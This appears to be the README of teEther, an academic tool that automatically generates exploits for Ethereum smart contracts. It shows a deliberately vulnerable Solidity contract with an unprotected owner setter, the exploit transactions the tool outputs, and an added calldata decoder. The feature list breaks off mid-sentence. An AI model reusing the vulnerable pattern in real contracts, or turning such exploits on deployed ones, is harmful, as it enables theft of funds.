Primary language: Python. License: Apache License 2.0 (Apache-2.0).

teEther - Analysis and automatic exploitation framework for Ethereum smart contracts

teEther is an analysis tool for Ethereum smart contracts. It can

Quickstart

  1. Install teEther

```
python setup.py install
```

  2. Write your vulnerable smart contract

```solidity
pragma solidity ^0.4.0;

contract Test{

    struct Transaction{
        address to;
        uint amount;
    }

    mapping (bytes32 => Transaction) transactions;

    address owner;
    
    // No access check: any caller can replace the owner.
    function set_owner(address new_owner){
        owner = new_owner;
    }
    
    // Records a pending transaction under the key sha3(to, amount).
    function new_transaction(address to, uint amount) returns (bytes32){
        bytes32 token = sha3(to, amount);
        Transaction storage t = transactions[token];
        t.to = to;
        t.amount += amount;
        return token;
    }
    
    // Only the current owner may trigger the payout.
    function approve(bytes32 token){
        require(owner == msg.sender);
        Transaction storage t = transactions[token];
        t.to.transfer(t.amount);
        delete transactions[token];
    }
    
}
```

  3. Compile your contract

```
$ solc --bin test.sol | tail -n1 > test.code
```

  4. Extract the deployed contract code

```
$ python bin/extract_contract_code.py test.code > test.contract.code
```

  5. Generate an exploit

```
$ python bin/gen_exploit.py test.contract.code 0x1234 0x1000 +1000

...
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0x7cb97b2b0000000000000000000000000000000000000000000000000000000000001234", to:"0x4000000000000000000000000000000000000000", gasPrice:0})
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0x0129ab2700000000000000000000000000000000000000000000000000000000000012340000000000000000000000000000000000000000000000016bc75e2d63100103", to:"0x4000000000000000000000000000000000000000", gasPrice:0})
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0xa53a1adfce9e2ef9fe2568f35b22f98bb749862a13e0abd291c6ba4967016d629412829d", to:"0x4000000000000000000000000000000000000000", gasPrice:0})
```
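The `data` field of each generated transaction is ABI calldata: a 4-byte function selector followed by 32-byte argument words. The following added example (not part of teEther or its README) decodes such a field and matches the selector against the signatures of the `Test` contract; the pure-Python Keccak-256 and the names `decode` and `SELECTORS` are this example's own.

```python
# Added example, not teEther code: decode the calldata gen_exploit.py printed.
# Ethereum hashes with original Keccak-256, which differs from hashlib.sha3_256.
def _rol(a, n):
    n %= 64
    return ((a << n) | (a >> (64 - n))) & (2**64 - 1)

def _keccak_f(A):
    R = 1
    for _ in range(24):
        C = [A[x] ^ A[x + 5] ^ A[x + 10] ^ A[x + 15] ^ A[x + 20] for x in range(5)]
        D = [C[(x + 4) % 5] ^ _rol(C[(x + 1) % 5], 1) for x in range(5)]
        A = [A[i] ^ D[i % 5] for i in range(25)]  # theta
        x, y, cur = 1, 0, A[1]
        for t in range(24):  # rho and pi
            x, y = y, (2 * x + 3 * y) % 5
            cur, A[x + 5 * y] = A[x + 5 * y], _rol(cur, (t + 1) * (t + 2) // 2)
        for y in range(0, 25, 5):  # chi
            T = A[y:y + 5]
            for x in range(5):
                A[y + x] = T[x] ^ (~T[(x + 1) % 5] & T[(x + 2) % 5])
        for j in range(7):  # iota, round constant from an LFSR
            R = ((R << 1) ^ ((R >> 7) * 0x71)) % 256
            if R & 2:
                A[0] ^= 1 << ((1 << j) - 1)
    return A

def keccak256(data):
    p = bytearray(data) + b"\x01"  # Keccak padding (SHA-3 would use 0x06)
    p += b"\x00" * (-len(p) % 136)
    p[-1] |= 0x80
    A = [0] * 25
    for off in range(0, len(p), 136):
        for i in range(17):
            A[i] ^= int.from_bytes(p[off + 8 * i:off + 8 * i + 8], "little")
        A = _keccak_f(A)
    return b"".join(a.to_bytes(8, "little") for a in A[:4])

# Signatures of the Test contract above; selector = first 4 bytes of the hash.
SELECTORS = {keccak256(s.encode())[:4].hex(): s for s in (
    "set_owner(address)", "new_transaction(address,uint256)", "approve(bytes32)")}

def decode(data_hex):
    """Return (matching signature or 'unknown', selector, 32-byte argument words)."""
    raw = bytes.fromhex(data_hex[2:])
    words = [raw[i:i + 32].hex() for i in range(4, len(raw), 32)]
    return SELECTORS.get(raw[:4].hex(), "unknown"), raw[:4].hex(), words

if __name__ == "__main__":
    # data field of the first transaction in the output above
    print(decode("0x7cb97b2b" + "1234".rjust(64, "0")))
```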

Academia

Our paper teEther: Gnawing at Ethereum to Automatically Exploit Smart Contracts was published at the 27th USENIX Security Symposium (Usenix Security 18) (slides, video).

```bibtex
@inproceedings{teEther2018,
          author = {Johannes Krupp and Christian Rossow},
       publisher = {USENIX Association},
       booktitle = {27th USENIX Security Symposium (USENIX Security 18)},
            year = {2018},
           title = {{teEther: Gnawing at Ethereum to Automatically Exploit Smart Contracts}},
             url = {https://publications.cispa.saarland/2612/},
}
```